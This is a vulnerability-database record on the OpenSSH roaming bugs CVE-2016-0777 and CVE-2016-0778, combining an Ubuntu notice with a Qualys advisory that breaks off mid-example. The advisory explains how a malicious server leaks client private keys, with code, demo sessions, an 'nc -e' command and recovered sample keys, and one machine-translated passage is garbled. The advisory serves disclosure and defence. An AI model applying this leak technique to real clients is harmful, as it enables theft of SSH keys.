    "data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the  context of the affected application. Failed attacks will cause  denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================\nUbuntu Security Notice USN-2869-1\nJanuary 14, 2016\n\nopenssh vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSH could be made to expose sensitive information over the network. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n  openssh-client                  1:6.9p1-2ubuntu0.1\n\nUbuntu 15.04:\n  openssh-client                  1:6.7p1-5ubuntu1.4\n\nUbuntu 14.04 LTS:\n  openssh-client                  1:6.6p1-2ubuntu2.4\n\nUbuntu 12.04 LTS:\n  openssh-client                  1:5.9p1-5ubuntu1.8\n\nIn general, a standard system update will make all the necessary changes. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66         if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67                 logit(\"Server denied roaming\");\n 68                 return;\n 69         }\n 70         verbose(\"Roaming enabled\");\n .. \n 75         set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78         if (size == 0 || size \u003e MAX_ROAMBUF)\n 79                 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80         /*\n 81          * The buffer size can only be set once and the buffer will live\n 82          * as long as the session lives. \n 83          */\n 84         if (out_buf == NULL) {\n 85                 out_buf_size = size;\n 86                 out_buf = xmalloc(size);\n 87                 out_start = 0;\n 88                 out_last = 0;\n 89         }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201         size_t available, needed;\n202\n203         if (out_start \u003c out_last)\n204                 available = out_last - out_start;\n205         else\n206                 available = out_buf_size;\n207         needed = write_bytes - *offset;\n208         debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209             (unsigned long)needed, (unsigned long long)*offset);\n210         if (needed \u003e available)\n211                 fatal(\"Needed to resend more data than in the cache\");\n212         if (out_last \u003c needed) {\n213                 int chunkend = needed - out_last;\n214                 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215                     chunkend);\n216                 atomicio(vwrite, fd, out_buf, out_last);\n217         } else {\n218                 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219         }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n  out_start is still equal to 0), and the amount of data available in\n  out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n  is exactly equal to \"out_last + 1\"), and the amount of data available\n  in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n  out_buf (and both out_start and out_last are still equal to 0) because\n  no data was ever sent to the server after roaming_reply() was called,\n  but the client sends (leaks) the entire uninitialized out_buf to the\n  server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n  and force malloc() to return a previously free()d but uncleansed chunk\n  of sensitive information. The simple proof-of-concept in this advisory\n  does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n  out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n  and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n  than get_snd_buf_size() are attainable because roaming_reply() does\n  not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n  wraparound. The proof-of-concept in this advisory attempts to derive\n  the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n  the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n  entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n  were actually written by the client to the server (because the server\n  controls the \"*offset\" argument, and resend_bytes() does not protect\n  \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n  a previously free()d chunk of memory that is recycled to malloc()ate\n  the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n  (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n  and both functions properly cleanse the private keys\u0027 memory with\n  OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n  (old API) or sshbuf_free() (new API), and both functions attempt to\n  cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n  load_public_identity_files(), which loads the client\u0027s public keys\n  with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n  (without the \".pub\" suffix) are loaded first and then discarded, but\n  nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n  by the client\u0027s public-key authentication method) loads a private key\n  with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n  fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n  is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n  of this private key may remain uncleansed in memory (a 3K copy in a 4K\n  buffer). Fortunately, only the file of a very large RSA key (for\n  example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n  256 bytes: if a private-key file is larger than 1K (the size passed to\n  read()), a partial copy of this private key may remain uncleansed in\n  memory (a 1K copy in a 1K buffer). For example, the file of a\n  default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+  Stopped                 /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n  initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n  change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n  ssh_connect_direct() method (a simple TCP connection) is called by\n  wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n  it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424         int sock = -1, attempt;\n 425         char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430         for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440                 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470                 }\n 471                 if (sock != -1)\n 472                         break;  /* Successful connection. */\n 473         }\n 474\n 475         /* Return failure if we didn\u0027t get a successful connection. */\n 476         if (sock == -1) {\n 477                 error(\"ssh: connect to host %s port %s: %s\",\n 478                     host, strport, strerror(errno));\n 479                 return (-1);\n 480         }\n\n  Incidentally, this error() call displays stack memory from the\n  uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n  client\u0027s stdin and stdout, but these file descriptors are close()d by\n  packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n  and are never reopened again, making it impossible for the client to\n  reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n  \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n  passes a connected file descriptor back to the client, but it calls\n  fatal() while reconnecting to the server, because waitpid() returns\n  ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n  the first successful connection to the server) calls waitpid() before\n  ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789         while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790             (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791                 ;\n1792\n1793         signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103     const char *proxy_command)\n 104 {\n ... \n 121         /* Fork and execute the proxy command. */\n 122         if ((pid = fork()) == 0) {\n ... \n 157         }\n 158         /* Parent. */\n ... \n 167         while (waitpid(pid, NULL, 0) == -1)\n 168                 if (errno != EINTR)\n 169                         fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n  connects the client to the server, but if a disconnection occurs, and\n  the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n  waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n  read() returns EINTR) and the client exit()s before it can reconnect\n  to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n  This behavior is intriguing, because (at least on Linux and BSD) the\n  signal() call that installed the main_sigchld_handler() is supposed to\n  be equivalent to a sigaction() call with SA_RESTART. However, portable\n  versions of OpenSSH override signal() with mysignal(), a function that\n  calls sigaction() without SA_RESTART. \n\n  This last mitigating factor is actually a race-condition bug that\n  depends on the ProxyCommand itself: for example, the client never\n  fails to reconnect to the server when using Socat as a ProxyCommand,\n  but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat 